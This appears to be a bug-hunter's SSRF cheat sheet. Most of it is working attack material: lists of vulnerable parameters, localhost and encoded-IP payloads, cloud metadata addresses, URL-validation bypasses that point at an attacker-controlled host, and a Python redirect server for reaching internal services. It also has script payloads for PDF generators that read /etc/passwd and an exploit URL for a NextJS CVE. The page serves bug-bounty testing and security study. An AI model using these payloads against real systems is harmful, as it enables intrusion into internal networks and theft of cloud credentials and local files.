SSRF

Detection - Vulnerable Parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}

SSRF vulnerabilities and where to find them - Labs DetectifyLabs Detectify

GitHub - MindPatch/lorsrf: Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load :crab:GitHub

Basic payload

http://127.0.0.1

127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost

localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3
.3.3.3/
127.1.1.1:80\\@127
.2.2.2:80/
127.1.1.1:80\\@@127
.2.2.2:80/
127.1.1.1:80:\\@@127
.2.2.2:80/
127.1.1.1:80#\\@127
.2.2.2:80/

Paylod List

payloads/ssrf.txt at main · coffinxp/payloadsGitHub

Finding SSRF with Burp

Match: https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)

Replace: https://{YOUR_SERVER}/ (Burp Collaborator)

Source: https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03

Bug Bounty tip Automating SSRFMedium

Port scan

http://127.0.0.1:§80§

Filter Bypass

URL Format BypassHackTricks

Decimal notation

http://2130706433 equals http://127.0.0.1.

SSRF payloadsMedium

Other notation

127.1 equals 127.0.0.1

GitHub - vysecurity/IPFuscator: IPFuscator - A tool to automatically generate alternative IP representationsGitHub

More payload: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass

Use your own server to redirect on localhost

Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo MailMedium

redirector.py:

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2: 
    print("""
Usage: {} <port_number> <url> 
    """.format(sys.argv[0]))
    sys.exit()
    
class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers() 
    def send_error(self, code, message=None): 
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Run redirector server:

python3 redirector.py 80 http://127.0.0.1

Vicitim payload: http://[YOUR_IP]

DNS Rebinding

rbndr.us dns rebinding service

Also try 127.0.0.1 and 169.254.169.254

Bypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium

Using Wayback And DNS rebinding For SSRFMedium

Server-side Request Forgery (SSRF) via DNS Rebinding AttackSecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Bypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium

More payloads

Also check Paylaod List

Cloud Metadata IP

169.254.169.254 
169.254.43518 
169.16689662
0xA9.254.0251.0376

New crazy payloads in the URL Validation Bypass Cheat SheetPortSwigger Research

URL / Host Validation Bypass

FreeDNS - Free subdomain AND domain hosting!

https://assets.example.com.attacker.com/

Replace "{CANARY_TOKEN}" with your controlled hostname and replace "example.com" with a whitelisted target host.

.{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Bypassing protocol whitelists

//{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%OD/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}

Gopher

How Gopher works in escalating SSRFsInfoSec Write-ups

GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various serversGitHub

Blind SSRF with OOB

GitHub - assetnote/blind-ssrf-chains: An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerabilityGitHub

Exploit Blind SSRF with OOB Techniques - TCM SecurityTCM Security - Penetration Testing & Consulting

See Use your own server to redirect on localhost

Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh

GitHub - projectdiscovery/interactsh: An OOB interaction gathering server and client libraryGitHub

SSRF (XSS) in PDF Generator

XSS

<iframe src="http://localhost/"></iframe>

<iframe src=file:///etc/passwd></iframe>

<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
  x.send();
</script>

<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open("GET","file:///etc/passwd"); x.send();
</script>

Some PDF generators rely on the Chromium web browser without sandbox security enabled and with root privileges. This can often be further escalated to remote code execution!

NextJS apps

CVE-2024-34351 - fixed in v14.1.1.

https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75

https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75

Digging for SSRF in NextJS apps

Tools

SSRFmap

GitHub - swisskyrepo/SSRFmap: Automatic SSRF fuzzer and exploitation toolGitHub

Autossrf

GitHub - Th0h0/autossrf: Smart context-based SSRF vulnerability scanner.GitHub

0dSSRF

GitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub

SSRFPwned

GitHub - blackhatethicalhacking/SSRFPwned: Checks for SSRF using built-in custom Payloads after fetching URLs from Multiple Passive Sources & applying complex patterns aimed at SSRFGitHub

Resources

SSRF: A complete guide to exploiting advanced SSRF vulnerabilitiesIntigriti

How To: Server-Side Request Forgery (SSRF)HackerOne

SSRF Cheat Sheet & Bypass Techniques

A10 Falsification de requête côté serveur (SSRF) - OWASP Top 10:2021

What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security AcademyWebSecAcademy

Server-Side Request Forgery (SSRF) | Common Attacks & Risks | ImpervaLearning Center

Server Side Request Forgery Prevention - OWASP Cheat Sheet Series

Server-Side Request Forgery (SSRF)Intigriti

I Studied 100+ SSRF Reports, and Here’s What I LearnedInfoSec Write-ups